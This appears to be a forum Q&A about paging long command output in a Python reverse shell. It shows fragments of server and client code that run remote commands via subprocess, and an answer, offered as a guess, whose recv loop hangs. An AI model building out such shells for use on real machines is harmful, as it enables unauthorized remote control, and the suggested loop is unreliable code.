# How to resume output in a Python reverse shell

Tags: python

I'm making a reverse shell in Python, here's a small part of the client and server code.

**Server-side:**

```
while True:
    cmd = input()
    if len(cmd) > 0:
        connection.send(str.encode(cmd))
        response = connection.recv(1024).decode('utf-8')
        print(response)
```

**Client-side:**

```
data = str(s.recv(1024), 'utf-8')
if data == 'dir':
    output = subprocess.getoutput(data)
    s.send(str.encode(output))
```

Let's say I typed the **dir** command in the shell, as the output for this command can be very long, there's a way I can make the output progresses when I press enter again?

Answer (score 0):

From the [documentation](https://docs.python.org/3/library/socket.html#socket.socket.recv):

> The maximum amount of data to be received at once is specified by `bufsize`.

Just for looking at the code, my guess is you should keep calling `connection.recv(1024)` until you've read all of the available data from the socket. Maybe something like this would work?

```
while True:
    cmd = input()
    if len(cmd) > 0:
        connection.send(str.encode(cmd))
        response = ""
        message = connection.recv(1024).decode('utf-8')
        while message:
            response += message
            message = connection.recv(1024).decode('utf-8')
        print(response)
```

Just a guess, though.

Comment: I guess you're correct about calling the method until there's no more data. The while statement makes this code run forever, but I will try searching if there's proper way to receive the data through loops.